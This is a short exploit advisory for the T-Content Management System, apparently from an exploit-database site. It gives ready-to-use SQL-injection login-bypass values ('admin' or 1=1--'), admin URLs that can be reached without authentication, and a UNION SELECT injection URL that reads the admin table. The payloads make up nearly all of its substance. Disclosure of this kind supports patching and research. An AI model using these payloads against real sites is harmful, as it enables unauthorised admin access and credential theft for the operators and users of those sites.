T-Content Management System SQL Injection

2011.02.08
Credit: Daniel Godoy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: T-Content Managment Multiple Vulnerability # Date: 06/02/2011 # Author: Daniel Godoy # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Software: http://www.telematica.com.ar/tcms.asp # http://www.telematica.com.ar/portfolio.asp # Tested on: Linux [Comment] Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota, Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick Jordan,Animacco , yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El Rodrix, l0ve, NetT0xic, Gusan0r, Sabertrail, Maxi Soler. Darioxchx,r0dr1,Zer0-Zo0rg [Authentication Bypass] http://path/admin/ user: admin' or 1=1-- pass: ' or 1=1-- or user: admin pass: ' or 1=1-- [Authentication Byppas 2] edit images : http://path/admin/galerias/admin_fotos.php?id_tipo=0&id_relacionado=0&nombre=Novedades edit content: http://path/admin/admin/novedades/inc_listado.php?orden=titulo [SQL Injection] http://path/notaevento.php?id_novedad=-1+UNION+SELECT+1,2,3,4+from+admin--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top